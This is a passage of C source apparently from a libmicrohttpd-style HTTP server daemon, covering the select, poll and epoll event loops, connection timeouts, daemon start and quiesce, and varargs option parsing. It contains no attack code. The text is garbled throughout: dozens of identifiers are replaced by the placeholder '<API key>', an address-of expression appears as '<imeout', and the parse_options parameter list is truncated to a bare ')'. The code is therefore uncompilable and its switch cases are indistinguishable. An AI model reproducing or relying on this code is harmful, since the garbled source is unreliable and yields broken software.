(MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
MHD_PANIC ("Failed to release cleanup mutex\n");
}
/**
* Obtain timeout value for `select()` for this daemon (only needed if
* connection timeout is used). The returned value is how long
* `select()` or `poll()` should at most block, not the timeout value set
* for connections. This function MUST NOT be called if MHD is
* running with #<API key>.
*
* @param daemon daemon to query for timeout
* @param timeout set to the timeout (in milliseconds)
* @return #MHD_YES on success, #MHD_NO if timeouts are
* not used (or no connections exist that would
* necessiate the use of a timeout right now).
* @ingroup event
*/
int
MHD_get_timeout (struct MHD_Daemon *daemon,
<API key> *timeout)
{
time_t earliest_deadline;
time_t now;
struct MHD_Connection *pos;
int have_timeout;
if (0 != (daemon->options & <API key>))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Illegal call to MHD_get_timeout\n");
#endif
return MHD_NO;
}
#if HTTPS_SUPPORT
if (0 != daemon->num_tls_read_ready)
{
/* if there is any TLS connection with data ready for
reading, we must not block in the event loop */
*timeout = 0;
return MHD_YES;
}
#endif
have_timeout = MHD_NO;
earliest_deadline = 0; /* avoid compiler warnings */
for (pos = daemon->manual_timeout_head; NULL != pos; pos = pos->nextX)
{
if (0 != pos->connection_timeout)
{
if ( (! have_timeout) ||
(earliest_deadline > time_t(pos->last_activity + pos->connection_timeout)) )
earliest_deadline = pos->last_activity + pos->connection_timeout;
#if HTTPS_SUPPORT
if ( (0 != (daemon->options & MHD_USE_SSL)) &&
(0 != <API key> (pos->tls_session)) )
earliest_deadline = 0;
#endif
have_timeout = MHD_YES;
}
}
/* normal timeouts are sorted, so we only need to look at the 'head' */
pos = daemon->normal_timeout_head;
if ( (NULL != pos) &&
(0 != pos->connection_timeout) )
{
if ( (! have_timeout) ||
(earliest_deadline > time_t(pos->last_activity + pos->connection_timeout)) )
earliest_deadline = pos->last_activity + pos->connection_timeout;
#if HTTPS_SUPPORT
if ( (0 != (daemon->options & MHD_USE_SSL)) &&
(0 != <API key> (pos->tls_session)) )
earliest_deadline = 0;
#endif
have_timeout = MHD_YES;
}
if (MHD_NO == have_timeout)
return MHD_NO;
now = MHD_monotonic_time();
if (earliest_deadline < now)
*timeout = 0;
else
*timeout = 1000 * (1 + earliest_deadline - now);
return MHD_YES;
}
/**
* Run webserver operations. This method should be called by clients
* in combination with #MHD_get_fdset if the client-controlled select
* method is used.
*
* You can use this function instead of #MHD_run if you called
* `select()` on the result from #MHD_get_fdset. File descriptors in
* the sets that are not controlled by MHD will be ignored. Calling
* this function instead of #MHD_run is more efficient as MHD will
* not have to call `select()` again to determine which operations are
* ready.
*
* @param daemon daemon to run select loop for
* @param read_fd_set read set
* @param write_fd_set write set
* @param except_fd_set except set (not used, can be NULL)
* @return #MHD_NO on serious errors, #MHD_YES on success
* @ingroup event
*/
int
MHD_run_from_select (struct MHD_Daemon *daemon,
const fd_set *read_fd_set,
const fd_set *write_fd_set,
const fd_set * /*except_fd_set*/)
{
MHD_socket ds;
char tmp;
struct MHD_Connection *pos;
struct MHD_Connection *next;
#if EPOLL_SUPPORT
if (0 != (daemon->options & <API key>))
{
/* we're in epoll mode, the epoll FD stands for
the entire event set! */
if (daemon->epoll_fd >= FD_SETSIZE)
return MHD_NO; /* poll fd too big, fail hard */
if (FD_ISSET (daemon->epoll_fd, read_fd_set))
return MHD_run (daemon);
return MHD_YES;
}
#endif
/* select connection thread handling type */
if ( (MHD_INVALID_SOCKET != (ds = daemon->socket_fd)) &&
(FD_ISSET (ds, read_fd_set)) )
(void) <API key> (daemon);
/* drain signaling pipe to avoid spinning select */
if ( (MHD_INVALID_PIPE_ != daemon->wpipe[0]) &&
(FD_ISSET (daemon->wpipe[0], read_fd_set)) )
(void)! MHD_pipe_read_ (daemon->wpipe[0], &tmp, sizeof (tmp));
if (0 == (daemon->options & <API key>))
{
/* do not have a thread per connection, process all connections now */
next = daemon->connections_head;
while (NULL != (pos = next))
{
next = pos->next;
ds = pos->socket_fd;
if (MHD_INVALID_SOCKET == ds)
continue;
switch (pos->event_loop_info)
{
case <API key>:
if ( (FD_ISSET (ds, read_fd_set))
#if HTTPS_SUPPORT
|| (MHD_YES == pos->tls_read_ready)
#endif
)
pos->read_handler (pos);
break;
case <API key>:
if ( (FD_ISSET (ds, read_fd_set)) &&
(pos->read_buffer_size > pos->read_buffer_offset) )
pos->read_handler (pos);
if (FD_ISSET (ds, write_fd_set))
pos->write_handler (pos);
break;
case <API key>:
if ( (FD_ISSET (ds, read_fd_set)) &&
(pos->read_buffer_size > pos->read_buffer_offset) )
pos->read_handler (pos);
break;
case <API key>:
/* should never happen */
break;
}
pos->idle_handler (pos);
}
}
<API key> (daemon);
return MHD_YES;
}
/**
* Main internal select() call. Will compute select sets, call select()
* and then #MHD_run_from_select with the result.
*
* @param daemon daemon to run select() loop for
* @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
* @return #MHD_NO on serious errors, #MHD_YES on success
*/
static int
MHD_select (struct MHD_Daemon *daemon,
int may_block)
{
int num_ready;
fd_set rs;
fd_set ws;
fd_set es;
MHD_socket max;
struct timeval timeout;
struct timeval *tv;
<API key> ltimeout;
timeout.tv_sec = 0;
timeout.tv_usec = 0;
if (MHD_YES == daemon->shutdown)
return MHD_NO;
FD_ZERO (&rs);
FD_ZERO (&ws);
FD_ZERO (&es);
max = MHD_INVALID_SOCKET;
bool at_connection_limit = daemon->connections == daemon->connection_limit; // Do not accept when at connection limit, by Milan Straka
if (0 == (daemon->options & <API key>))
{
if (<API key> == (daemon->options & <API key>))
<API key> (daemon);
/* single-threaded, go over everything */
if (MHD_NO == MHD_get_fdset2 (daemon, &rs, &ws, &es, &max, FD_SETSIZE))
return MHD_NO;
/* If we're at the connection limit, no need to
accept new connections. */
if ( at_connection_limit &&
(MHD_INVALID_SOCKET != daemon->socket_fd) )
FD_CLR (daemon->socket_fd, &rs);
}
else
{
/* accept only, have one thread per connection */
if (!at_connection_limit)
if (MHD_INVALID_SOCKET != daemon->socket_fd &&
MHD_YES != add_to_fd_set(daemon->socket_fd, &rs, &max, FD_SETSIZE))
return MHD_NO;
}
if (MHD_INVALID_PIPE_ != daemon->wpipe[0] &&
MHD_YES != add_to_fd_set(daemon->wpipe[0], &rs, &max, FD_SETSIZE))
return MHD_NO;
tv = NULL;
if (MHD_NO == may_block)
{
timeout.tv_usec = 0;
timeout.tv_sec = 0;
tv = &timeout;
}
else if ( (0 == (daemon->options & <API key>)) &&
(MHD_YES == MHD_get_timeout (daemon, <imeout)) )
{
/* ltimeout is in ms */
timeout.tv_usec = (ltimeout % 1000) * 1000;
timeout.tv_sec = ltimeout / 1000;
tv = &timeout;
}
else if ( (0 != (daemon->options & <API key>)) && at_connection_limit)
{
// We are ignoring the listening socket because of reaching connection limit, by Milan Straka
timeout.tv_usec = 5000;
timeout.tv_sec = 0;
tv = &timeout;
}
if (MHD_INVALID_SOCKET == max)
return MHD_YES;
num_ready = MHD_SYS_select_ (max + 1, &rs, &ws, &es, tv);
if (MHD_YES == daemon->shutdown)
return MHD_NO;
if (num_ready < 0)
{
if (EINTR == MHD_socket_errno_)
return MHD_YES;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"select failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
return MHD_run_from_select (daemon, &rs, &ws, &es);
}
#ifdef HAVE_POLL_H
/**
* Process all of our connections and possibly the server
* socket using poll().
*
* @param daemon daemon to run poll loop for
* @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
* @return #MHD_NO on serious errors, #MHD_YES on success
*/
static int
MHD_poll_all (struct MHD_Daemon *daemon,
int may_block)
{
unsigned int num_connections;
struct MHD_Connection *pos;
struct MHD_Connection *next;
if (<API key> == (daemon->options & <API key>))
<API key> (daemon);
/* count number of connections and thus determine poll set size */
num_connections = 0;
for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
num_connections++;
{
struct pollfd p[2 + num_connections];
<API key> ltimeout;
unsigned int i;
int timeout;
unsigned int poll_server;
int poll_listen;
memset (p, 0, sizeof (p));
poll_server = 0;
poll_listen = -1;
if ( (MHD_INVALID_SOCKET != daemon->socket_fd) &&
(daemon->connections < daemon->connection_limit) )
{
/* only listen if we are not at the connection limit */
p[poll_server].fd = daemon->socket_fd;
p[poll_server].events = POLLIN;
p[poll_server].revents = 0;
poll_listen = (int) poll_server;
poll_server++;
}
if (MHD_INVALID_PIPE_ != daemon->wpipe[0])
{
p[poll_server].fd = daemon->wpipe[0];
p[poll_server].events = POLLIN;
p[poll_server].revents = 0;
poll_server++;
}
if (may_block == MHD_NO)
timeout = 0;
else if ( (0 != (daemon->options & <API key>)) ||
(MHD_YES != MHD_get_timeout (daemon, <imeout)) )
timeout = -1;
else
timeout = (ltimeout > INT_MAX) ? INT_MAX : (int) ltimeout;
i = 0;
for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
{
p[poll_server+i].fd = pos->socket_fd;
switch (pos->event_loop_info)
{
case <API key>:
p[poll_server+i].events |= POLLIN;
break;
case <API key>:
p[poll_server+i].events |= POLLOUT;
if (pos->read_buffer_size > pos->read_buffer_offset)
p[poll_server+i].events |= POLLIN;
break;
case <API key>:
if (pos->read_buffer_size > pos->read_buffer_offset)
p[poll_server+i].events |= POLLIN;
break;
case <API key>:
/* should never happen */
break;
}
i++;
}
if (0 == poll_server + num_connections)
return MHD_YES;
if (poll (p, poll_server + num_connections, timeout) < 0)
{
if (EINTR == MHD_socket_errno_)
return MHD_YES;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"poll failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
/* handle shutdown */
if (MHD_YES == daemon->shutdown)
return MHD_NO;
i = 0;
next = daemon->connections_head;
while (NULL != (pos = next))
{
next = pos->next;
switch (pos->event_loop_info)
{
case <API key>:
/* first, sanity checks */
if (i >= num_connections)
break; /* connection list changed somehow, retry later ... */
if (p[poll_server+i].fd != pos->socket_fd)
break; /* fd mismatch, something else happened, retry later ... */
/* normal handling */
if (0 != (p[poll_server+i].revents & POLLIN))
pos->read_handler (pos);
pos->idle_handler (pos);
i++;
break;
case <API key>:
/* first, sanity checks */
if (i >= num_connections)
break; /* connection list changed somehow, retry later ... */
if (p[poll_server+i].fd != pos->socket_fd)
break; /* fd mismatch, something else happened, retry later ... */
/* normal handling */
if (0 != (p[poll_server+i].revents & POLLIN))
pos->read_handler (pos);
if (0 != (p[poll_server+i].revents & POLLOUT))
pos->write_handler (pos);
pos->idle_handler (pos);
i++;
break;
case <API key>:
if (0 != (p[poll_server+i].revents & POLLIN))
pos->read_handler (pos);
pos->idle_handler (pos);
break;
case <API key>:
/* should never happen */
pos->idle_handler (pos); // Add forgotten idle_handler, by Milan Straka.
break;
}
}
/* handle 'listen' FD */
if ( (-1 != poll_listen) &&
(0 != (p[poll_listen].revents & POLLIN)) )
(void) <API key> (daemon);
}
return MHD_YES;
}
/**
* Process only the listen socket using poll().
*
* @param daemon daemon to run poll loop for
* @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
* @return #MHD_NO on serious errors, #MHD_YES on success
*/
static int
<API key> (struct MHD_Daemon *daemon,
int may_block)
{
struct pollfd p[2];
int timeout;
unsigned int poll_count;
int poll_listen;
bool at_connection_limit = daemon->connections == daemon->connection_limit; // Do not accept when at connection limit, by Milan Straka
memset (&p, 0, sizeof (p));
poll_count = 0;
poll_listen = -1;
if (!at_connection_limit && MHD_INVALID_SOCKET != daemon->socket_fd)
{
p[poll_count].fd = daemon->socket_fd;
p[poll_count].events = POLLIN;
p[poll_count].revents = 0;
poll_listen = poll_count;
poll_count++;
}
if (MHD_INVALID_PIPE_ != daemon->wpipe[0])
{
p[poll_count].fd = daemon->wpipe[0];
p[poll_count].events = POLLIN;
p[poll_count].revents = 0;
poll_count++;
}
if (MHD_NO == may_block)
timeout = 0;
else
timeout = at_connection_limit ? 5 : -1;
if (0 == poll_count)
return MHD_YES;
if (poll (p, poll_count, timeout) < 0)
{
if (EINTR == MHD_socket_errno_)
return MHD_YES;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"poll failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
/* handle shutdown */
if (MHD_YES == daemon->shutdown)
return MHD_NO;
if ( (-1 != poll_listen) &&
(0 != (p[poll_listen].revents & POLLIN)) )
(void) <API key> (daemon);
return MHD_YES;
}
#endif
/**
* Do poll()-based processing.
*
* @param daemon daemon to run poll()-loop for
* @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
* @return #MHD_NO on serious errors, #MHD_YES on success
*/
#ifdef HAVE_POLL_H
static int
MHD_poll (struct MHD_Daemon *daemon,
int may_block)
{
if (MHD_YES == daemon->shutdown)
return MHD_NO;
if (0 == (daemon->options & <API key>))
return MHD_poll_all (daemon, may_block);
else
return <API key> (daemon, may_block);
}
#else
static int
MHD_poll (struct MHD_Daemon * /*daemon*/,
int /*may_block*/)
{
return MHD_NO;
}
#endif
#if EPOLL_SUPPORT
#define MAX_EVENTS 128
/**
* Do epoll()-based processing (this function is allowed to
* block if @a may_block is set to #MHD_YES).
*
* @param daemon daemon to run poll loop for
* @param may_block #MHD_YES if blocking, #MHD_NO if non-blocking
* @return #MHD_NO on serious errors, #MHD_YES on success
*/
static int
MHD_epoll (struct MHD_Daemon *daemon,
int may_block)
{
struct MHD_Connection *pos;
struct MHD_Connection *next;
struct epoll_event events[MAX_EVENTS];
struct epoll_event event;
int timeout_ms;
<API key> timeout_ll;
int num_events;
unsigned int i;
unsigned int series_length;
char tmp;
if (-1 == daemon->epoll_fd)
return MHD_NO; /* we're down! */
if (MHD_YES == daemon->shutdown)
return MHD_NO;
if ( (MHD_INVALID_SOCKET != daemon->socket_fd) &&
(daemon->connections < daemon->connection_limit) &&
(MHD_NO == daemon-><API key>) )
{
event.events = EPOLLIN;
event.data.ptr = daemon;
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_ADD,
daemon->socket_fd,
&event))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to epoll_ctl failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
daemon-><API key> = MHD_YES;
}
if ( (MHD_YES == daemon-><API key>) &&
(daemon->connections == daemon->connection_limit) )
{
/* we're at the connection limit, disable listen socket
for event loop for now */
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_DEL,
daemon->socket_fd,
NULL))
MHD_PANIC ("Failed to remove listen FD from epoll set\n");
daemon-><API key> = MHD_NO;
}
if (MHD_YES == may_block)
{
if (MHD_YES == MHD_get_timeout (daemon,
&timeout_ll))
{
if (timeout_ll >= (<API key>) INT_MAX)
timeout_ms = INT_MAX;
else
timeout_ms = (int) timeout_ll;
}
else
timeout_ms = -1;
}
else
timeout_ms = 0;
/* drain 'epoll' event queue; need to iterate as we get at most
MAX_EVENTS in one system call here; in practice this should
pretty much mean only one round, but better an extra loop here
than unfair behavior... */
num_events = MAX_EVENTS;
while (MAX_EVENTS == num_events)
{
/* update event masks */
num_events = epoll_wait (daemon->epoll_fd,
events, MAX_EVENTS, timeout_ms);
if (-1 == num_events)
{
if (EINTR == MHD_socket_errno_)
return MHD_YES;
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Call to epoll_wait failed: %s\n",
<API key> ());
#endif
return MHD_NO;
}
for (i=0;i<(unsigned int) num_events;i++)
{
if (NULL == events[i].data.ptr)
continue; /* shutdown signal! */
if ( (MHD_INVALID_PIPE_ != daemon->wpipe[0]) &&
(daemon->wpipe[0] == events[i].data.fd) )
{
(void)! MHD_pipe_read_ (daemon->wpipe[0], &tmp, sizeof (tmp));
continue;
}
if (daemon != events[i].data.ptr)
{
/* this is an event relating to a 'normal' connection,
remember the event and if appropriate mark the
connection as 'eready'. */
pos = events[i].data.ptr;
if (0 != (events[i].events & EPOLLIN))
{
pos->epoll_state |= <API key>;
if ( ( (<API key> == pos->event_loop_info) ||
(pos->read_buffer_size > pos->read_buffer_offset) ) &&
(0 == (pos->epoll_state & <API key>) ) )
{
EDLL_insert (daemon->eready_head,
daemon->eready_tail,
pos);
pos->epoll_state |= <API key>;
}
}
if (0 != (events[i].events & EPOLLOUT))
{
pos->epoll_state |= <API key>;
if ( (<API key> == pos->event_loop_info) &&
(0 == (pos->epoll_state & <API key>) ) )
{
EDLL_insert (daemon->eready_head,
daemon->eready_tail,
pos);
pos->epoll_state |= <API key>;
}
}
}
else /* must be listen socket */
{
/* run 'accept' until it fails or we are not allowed to take
on more connections */
series_length = 0;
while ( (MHD_YES == <API key> (daemon)) &&
(daemon->connections < daemon->connection_limit) &&
(series_length < 128) )
series_length++;
}
}
}
/* we handle resumes here because we may have ready connections
that will not be placed into the epoll list immediately. */
if (<API key> == (daemon->options & <API key>))
<API key> (daemon);
/* process events for connections */
while (NULL != (pos = daemon->eready_tail))
{
EDLL_remove (daemon->eready_head,
daemon->eready_tail,
pos);
pos->epoll_state &= ~<API key>;
if (<API key> == pos->event_loop_info)
pos->read_handler (pos);
if (<API key> == pos->event_loop_info)
pos->write_handler (pos);
pos->idle_handler (pos);
}
/* Finally, handle timed-out connections; we need to do this here
as the epoll mechanism won't call the 'idle_handler' on everything,
as the other event loops do. As timeouts do not get an explicit
event, we need to find those connections that might have timed out
here.
Connections with custom timeouts must all be looked at, as we
do not bother to sort that (presumably very short) list. */
next = daemon->manual_timeout_head;
while (NULL != (pos = next))
{
next = pos->nextX;
pos->idle_handler (pos);
}
/* Connections with the default timeout are sorted by prepending
them to the head of the list whenever we touch the connection;
thus it sufficies to iterate from the tail until the first
connection is NOT timed out */
next = daemon->normal_timeout_tail;
while (NULL != (pos = next))
{
next = pos->prevX;
pos->idle_handler (pos);
if (<API key> != pos->state)
break; /* sorted by timeout, no need to visit the rest! */
}
return MHD_YES;
}
#endif
/**
* Run webserver operations (without blocking unless in client
* callbacks). This method should be called by clients in combination
* with #MHD_get_fdset if the client-controlled select method is used.
*
* This function is a convenience method, which is useful if the
* fd_sets from #MHD_get_fdset were not directly passed to `select()`;
* with this function, MHD will internally do the appropriate `select()`
* call itself again. While it is always safe to call #MHD_run (in
* external select mode), you should call #MHD_run_from_select if
* performance is important (as it saves an expensive call to
* `select()`).
*
* @param daemon daemon to run
* @return #MHD_YES on success, #MHD_NO if this
* daemon was not started with the right
* options for this call.
* @ingroup event
*/
int
MHD_run (struct MHD_Daemon *daemon)
{
if ( (MHD_YES == daemon->shutdown) ||
(0 != (daemon->options & <API key>)) ||
(0 != (daemon->options & <API key>)) )
return MHD_NO;
if (0 != (daemon->options & MHD_USE_POLL))
{
MHD_poll (daemon, MHD_NO);
<API key> (daemon);
}
#if EPOLL_SUPPORT
else if (0 != (daemon->options & <API key>))
{
MHD_epoll (daemon, MHD_NO);
<API key> (daemon);
}
#endif
else
{
MHD_select (daemon, MHD_NO);
/* MHD_select does <API key> already */
}
return MHD_YES;
}
/**
* Thread that runs the select loop until the daemon
* is explicitly shut down.
*
* @param cls 'struct MHD_Deamon' to run select loop in a thread for
* @return always 0 (on shutdown)
*/
static MHD_THRD_RTRN_TYPE_ MHD_THRD_CALL_SPEC_
MHD_select_thread (void *cls)
{
struct MHD_Daemon *daemon = (struct MHD_Daemon*) cls;
while (MHD_YES != daemon->shutdown)
{
if (0 != (daemon->options & MHD_USE_POLL))
MHD_poll (daemon, MHD_YES);
#if EPOLL_SUPPORT
else if (0 != (daemon->options & <API key>))
MHD_epoll (daemon, MHD_YES);
#endif
else
MHD_select (daemon, MHD_YES);
<API key> (daemon);
}
return (MHD_THRD_RTRN_TYPE_)0;
}
/**
* Process escape sequences ('%HH') Updates val in place; the
* result should be UTF-8 encoded and cannot be larger than the input.
* The result must also still be 0-terminated.
*
* @param cls closure (use NULL)
* @param connection handle to connection, not used
* @param val value to unescape (modified in the process)
* @return length of the resulting val (strlen(val) maybe
* shorter afterwards due to elimination of escape sequences)
*/
static size_t
unescape_wrapper (void * /*cls*/,
struct MHD_Connection * /*connection*/,
char *val)
{
return MHD_http_unescape (val);
}
/**
* Start a webserver on the given port. Variadic version of
* #MHD_start_daemon_va.
*
* @param flags combination of `enum MHD_FLAG` values
* @param port port to bind to
* @param apc callback to call to check which clients
* will be allowed to connect; you can pass NULL
* in which case connections from any IP will be
* accepted
* @param apc_cls extra argument to @a apc
* @param dh handler called for all requests (repeatedly)
* @param dh_cls extra argument to @a dh
* @return NULL on error, handle to daemon on success
* @ingroup event
*/
struct MHD_Daemon *
MHD_start_daemon (unsigned int flags,
uint16_t port,
<API key> apc,
void *apc_cls,
<API key> dh, void *dh_cls, ...)
{
struct MHD_Daemon *daemon;
va_list ap;
va_start (ap, dh_cls);
daemon = MHD_start_daemon_va (flags, port, apc, apc_cls, dh, dh_cls, ap);
va_end (ap);
return daemon;
}
/**
* Stop accepting connections from the listening socket. Allows
* clients to continue processing, but stops accepting new
* connections. Note that the caller is responsible for closing the
* returned socket; however, if MHD is run using threads (anything but
* external select mode), it must not be closed until AFTER
* #MHD_stop_daemon has been called (as it is theoretically possible
* that an existing thread is still using it).
*
* Note that some thread modes require the caller to have passed
* #<API key> when using this API. If this daemon is
* in one of those modes and this option was not given to
* #MHD_start_daemon, this function will return #MHD_INVALID_SOCKET.
*
* @param daemon daemon to stop accepting new connections for
* @return old listen socket on success, #MHD_INVALID_SOCKET if
* the daemon was already not listening anymore
* @ingroup specialized
*/
MHD_socket
MHD_quiesce_daemon (struct MHD_Daemon *daemon)
{
unsigned int i;
MHD_socket ret;
ret = daemon->socket_fd;
if (MHD_INVALID_SOCKET == ret)
return MHD_INVALID_SOCKET;
if ( (MHD_INVALID_PIPE_ == daemon->wpipe[1]) &&
(0 != (daemon->options & (<API key> | <API key>))) )
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Using MHD_quiesce_daemon in this mode requires <API key>\n");
#endif
return MHD_INVALID_SOCKET;
}
if (NULL != daemon->worker_pool)
for (i = 0; i < daemon->worker_pool_size; i++)
{
daemon->worker_pool[i].socket_fd = MHD_INVALID_SOCKET;
if (MHD_INVALID_PIPE_ != daemon->worker_pool[i].wpipe[1])
(void)! MHD_pipe_write_ (daemon->worker_pool[i].wpipe[1], "q", 1);
#if EPOLL_SUPPORT
if ( (0 != (daemon->options & <API key>)) &&
(-1 != daemon->worker_pool[i].epoll_fd) &&
(MHD_YES == daemon->worker_pool[i].<API key>) )
{
if (0 != epoll_ctl (daemon->worker_pool[i].epoll_fd,
EPOLL_CTL_DEL,
ret,
NULL))
MHD_PANIC ("Failed to remove listen FD from epoll set\n");
daemon->worker_pool[i].<API key> = MHD_NO;
}
#endif
}
daemon->socket_fd = MHD_INVALID_SOCKET;
if (MHD_INVALID_PIPE_ != daemon->wpipe[1])
(void)! MHD_pipe_write_ (daemon->wpipe[1], "q", 1);
#if EPOLL_SUPPORT
if ( (0 != (daemon->options & <API key>)) &&
(-1 != daemon->epoll_fd) &&
(MHD_YES == daemon-><API key>) )
{
if (0 != epoll_ctl (daemon->epoll_fd,
EPOLL_CTL_DEL,
ret,
NULL))
MHD_PANIC ("Failed to remove listen FD from epoll set\n");
daemon-><API key> = MHD_NO;
}
#endif
return ret;
}
/**
* Signature of the MHD custom logger function.
*
* @param cls closure
* @param format format string
* @param va arguments to the format string (fprintf-style)
*/
typedef int (*<API key>)(void *cls,
const char *format,
va_list va);
/**
* Parse a list of options given as varargs.
*
* @param daemon the daemon to initialize
* @param servaddr where to store the server's listen address
* @param ap the options
* @return #MHD_YES on success, #MHD_NO on error
*/
static int
parse_options_va (struct MHD_Daemon *daemon,
const struct sockaddr **servaddr,
va_list ap);
/**
* Parse a list of options given as varargs.
*
* @param daemon the daemon to initialize
* @param servaddr where to store the server's listen address
* @param ... the options
* @return #MHD_YES on success, #MHD_NO on error
*/
static int
parse_options (struct MHD_Daemon *daemon,
const struct sockaddr **servaddr,
)
{
va_list ap;
int ret;
va_start (ap, servaddr);
ret = parse_options_va (daemon, servaddr, ap);
va_end (ap);
return ret;
}
/**
* Parse a list of options given as varargs.
*
* @param daemon the daemon to initialize
* @param servaddr where to store the server's listen address
* @param ap the options
* @return #MHD_YES on success, #MHD_NO on error
*/
static int
parse_options_va (struct MHD_Daemon *daemon,
const struct sockaddr **servaddr,
va_list ap)
{
enum MHD_OPTION opt;
struct MHD_OptionItem *oa;
unsigned int i;
#if HTTPS_SUPPORT
int ret;
const char *pstr;
#endif
while (MHD_OPTION_END != (opt = (enum MHD_OPTION) va_arg (ap, int)))
{
switch (opt)
{
case <API key>:
daemon->pool_size = va_arg (ap, size_t);
break;
case <API key>:
daemon->pool_increment= va_arg (ap, size_t);
break;
case <API key>:
daemon->connection_limit = va_arg (ap, unsigned int);
break;
case <API key>:
daemon->connection_timeout = va_arg (ap, unsigned int);
break;
case <API key>:
daemon->notify_completed =
va_arg (ap, <API key>);
daemon-><API key> = va_arg (ap, void *);
break;
case <API key>:
daemon-><API key> = va_arg (ap, unsigned int);
break;
case <API key>:
*servaddr = va_arg (ap, const struct sockaddr *);
break;
case <API key>:
daemon->uri_log_callback =
va_arg (ap, LogCallback);
daemon-><API key> = va_arg (ap, void *);
break;
case <API key>:
daemon->worker_pool_size = va_arg (ap, unsigned int);
if (daemon->worker_pool_size >= (UINT_MAX / sizeof (struct MHD_Daemon)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Specified thread pool size (%u) too big\n",
daemon->worker_pool_size);
#endif
return MHD_NO;
}
break;
#if HTTPS_SUPPORT
case <API key>:
if (0 != (daemon->options & MHD_USE_SSL))
daemon->https_mem_key = va_arg (ap, const char *);
#if HAVE_MESSAGES
else
MHD_DLOG (daemon,
"MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
opt);
#endif
break;
case <API key>:
if (0 != (daemon->options & MHD_USE_SSL))
daemon->https_mem_cert = va_arg (ap, const char *);
#if HAVE_MESSAGES
else
MHD_DLOG (daemon,
"MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
opt);
#endif
break;
case <API key>:
if (0 != (daemon->options & MHD_USE_SSL))
daemon->https_mem_trust = va_arg (ap, const char *);
#if HAVE_MESSAGES
else
MHD_DLOG (daemon,
"MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
opt);
#endif
break;
case <API key>:
daemon->cred_type = (<API key>) va_arg (ap, int);
break;
case <API key>:
if (0 != (daemon->options & MHD_USE_SSL))
{
const char *arg = va_arg (ap, const char *);
gnutls_datum_t dhpar;
if (<API key> (&daemon->https_mem_dhparams) < 0)
{
#if HAVE_MESSAGES
MHD_DLOG(daemon,
"Error initializing DH parameters\n");
#endif
return MHD_NO;
}
dhpar.data = (unsigned char *) arg;
dhpar.size = strlen (arg);
if (<API key> (daemon->https_mem_dhparams, &dhpar,
GNUTLS_X509_FMT_PEM) < 0)
{
#if HAVE_MESSAGES
MHD_DLOG(daemon,
"Bad Diffie-Hellman parameters format\n");
#endif
<API key> (daemon->https_mem_dhparams);
return MHD_NO;
}
daemon->have_dhparams = MHD_YES;
}
else
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
opt);
#endif
return MHD_NO;
}
break;
case <API key>:
if (0 != (daemon->options & MHD_USE_SSL))
{
<API key> (daemon->priority_cache);
ret = <API key> (&daemon->priority_cache,
pstr = va_arg (ap, const char*),
NULL);
if (GNUTLS_E_SUCCESS != ret)
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Setting priorities to `%s' failed: %s\n",
pstr,
gnutls_strerror (ret));
#endif
daemon->priority_cache = NULL;
return MHD_NO;
}
}
break;
case <API key>:
#if <API key> < 3
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"<API key> requires building MHD with GnuTLS >= 3.0\n");
#endif
return MHD_NO;
#else
if (0 != (daemon->options & MHD_USE_SSL))
daemon->cert_callback = va_arg (ap, <API key> *);
break;
#endif
#endif
#ifdef DAUTH_SUPPORT
case <API key>:
daemon-><API key> = va_arg (ap, size_t);
daemon->digest_auth_random = va_arg (ap, const char *);
break;
case <API key>:
daemon->nonce_nc_size = va_arg (ap, unsigned int);
break;
#endif
case <API key>:
daemon->socket_fd = va_arg (ap, MHD_socket);
break;
case <API key>:
#if HAVE_MESSAGES
daemon->custom_error_log =
va_arg (ap, <API key>);
daemon-><API key> = va_arg (ap, void *);
#else
va_arg (ap, <API key>);
va_arg (ap, void *);
#endif
break;
case <API key>:
daemon->thread_stack_size = va_arg (ap, size_t);
break;
#ifdef TCP_FASTOPEN
case <API key>:
daemon->fastopen_queue_size = va_arg (ap, unsigned int);
break;
#endif
case <API key>:
daemon-><API key> = va_arg (ap, unsigned int) ? 1 : -1;
break;
case MHD_OPTION_ARRAY:
oa = va_arg (ap, struct MHD_OptionItem*);
i = 0;
while (MHD_OPTION_END != (opt = oa[i].option))
{
switch (opt)
{
/* all options taking 'size_t' */
case <API key>:
case <API key>:
case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
(size_t) oa[i].value,
MHD_OPTION_END))
return MHD_NO;
break;
/* all options taking 'unsigned int' */
case <API key>:
case <API key>:
case <API key>:
case <API key>:
case <API key>:
case <API key>:
case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
(unsigned int) oa[i].value,
MHD_OPTION_END))
return MHD_NO;
break;
/* all options taking 'enum' */
case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
(int) oa[i].value,
MHD_OPTION_END))
return MHD_NO;
break;
/* all options taking 'MHD_socket' */
case <API key>:
if (MHD_YES != parse_options (daemon,
servaddr,
opt,
(MHD_socket) oa[i].value,
MHD_OPTION_END))
return MHD_NO;
break;
/* all options taking one pointer */
case <API key>:
case <API key>:
case <API key>:
case <API key>:
case <API key>:
case MHD_OPTION_ARRAY:
